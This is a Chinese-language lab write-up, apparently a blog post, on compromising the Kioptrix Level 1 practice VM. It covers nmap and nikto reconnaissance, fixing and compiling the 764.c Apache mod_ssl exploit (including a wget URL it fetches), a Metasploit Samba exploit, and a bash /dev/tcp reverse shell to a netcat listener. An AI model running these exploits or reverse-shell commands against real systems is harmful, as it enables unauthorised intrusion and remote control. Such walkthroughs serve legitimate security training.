Kioptrix Level 1靶機滲透

一、kali nmap 發現主機

1.用namp掃描c段 沒發現主機

解決辦法 :

(1):打開靶機所在文件夾,找到vmx后綴的文件并打開

(2):將Bridged全部改成nat(默認是橋接模式,因為kali是nat才能掃描IP)

2.識別到主機IP為192.168.65.134
3.端口掃描,發現開放了80、22、111、139、443、1024端口
4.nikto目錄掃描

二、漏洞利用之apache

1.搜索apache 1.3.20版本漏洞
2.編譯執行漏洞
  • 發現編譯764.c失敗,解決辦法如下:
  1. 安裝libssl,命令sudo apt-get install libssl1.0-dev
  1. 在頭文件添加#include <openssl/rc4.h> #include <openssl/md5.h>
  1. 將#define COMMAND2,wget后面的URL修改為https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c;
  1. 將unsigned char *p, *end前添加const

5.在kali編譯成功gcc -o okk 764.c -lcrypto

  1. 執行漏洞成功./okk 0x6b 192.168.65.134 -c 40

三、漏洞利用之Samba

Samba是在LinuxUNIX系統上實現SMB協議的一個免費軟件,由服務器及客戶端程序構成

1.信息收集發現主機139端口安裝了samba,版本為Samba 2.2.1a
2.直接msf搜索samba
3.漏洞利用提權
4.nc反彈shell

1.kali nc監聽端口nc -lvvp 1234

2.反彈shellbash -i >& /dev/tcp/192.168.65.129/1234 0>&1(192.168.65.129是kali主機的ip,不是靶機的ip)


3.反彈成功

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容